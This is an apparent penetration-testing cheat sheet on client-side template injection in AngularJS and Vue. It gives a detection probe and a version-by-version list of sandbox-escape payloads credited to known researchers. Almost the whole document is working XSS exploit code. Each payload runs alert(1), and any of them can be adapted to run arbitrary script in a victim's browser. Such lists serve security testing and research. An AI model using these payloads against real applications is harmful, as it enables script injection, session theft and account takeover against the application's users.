AngularJS

AngularJS is an MVC client-side framework written by Google.

Client-Side Template Injection (XSS)

With Angular, the HTML pages you see via view-source or Burp containing ‘ng-app’ are actually templates, and will be rendered by Angular. This means that if user input is directly embedded into a page, the application may be vulnerable to client-side template injection. This is true even if the user input is HTML-encoded and inside an attribute.

Detection

Detect if the web application is vulnerable using a simple expression:

{{1+1}}
Exploitation

Angular expressions are sandboxed ‘to maintain a proper separation of application responsibilities’. In order to exploit users, we need to break out of the sandbox and execute arbitrary JavaScript. Use the following list of known sandbox escapes:

Angular 1.6+ by Mario Heiderich:

{{constructor.constructor('alert(1)')()}}

Angular 1.6+ by @brutelogic:

{{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}

Example available at https://brutelogic.com.br/xss.php

Angular 1.6.0 by @LewisArdern & @garethheyes:

{{0[a='constructor'][a]('alert(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}

Angular 1.5.9 - 1.5.11 by Jan Horn:

{{
    c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
    c.$apply=$apply;c.$eval=b;op=$root.$$phase;
    $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
    C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
    B=C(b,c,b);$evalAsync("
    astNode=pop();astNode.type='UnaryExpression';
    astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
    astNode.argument={type:'Identifier',name:'foo'};
    ");
    m1=B($$asyncQueue.pop().expression,null,$root);
    m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
    $eval('a(b.c)');[].push.apply=a;
}}

Angular 1.5.0 - 1.5.8:

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}

Angular 1.4.0 - 1.4.9:

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

Angular 1.3.20:

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}

Angular 1.3.19:

{{
    'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
    $eval('x=alert(1)//');
}}

Angular 1.3.3 - 1.3.18:

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
  'a'.constructor.prototype.charAt=[].join;
  $eval('x=alert(1)//');  }}

Angular 1.3.1 - 1.3.2:

{{
    {}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
    'a'.constructor.prototype.charAt=''.valueOf;
    $eval('x=alert(1)//');
}}

Angular 1.3.0:

{{!ready && (ready = true) && (
      !call
      ? $$watchers[0].get(toString.constructor.prototype)
      : (a = apply) &&
        (apply = constructor) &&
        (valueOf = call) &&
        (''+''.toString(
          'F = Function.prototype;' +
          'F.apply = F.a;' +
          'delete F.a;' +
          'delete F.valueOf;' +
          'alert(1);'
        ))
    );}}

Angular 1.2.24 - 1.2.29:

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}

Angular 1.2.19 - 1.2.23:

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}

Angular 1.2.6 - 1.2.18:

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}

Angular 1.2.2 - 1.2.5:

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}

Angular 1.2.0 - 1.2.1:

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

Angular 1.0.1 - 1.1.5:

{{constructor.constructor('alert(1)')()}}

Vue JS:

{{constructor.constructor('alert(1)')()}}
References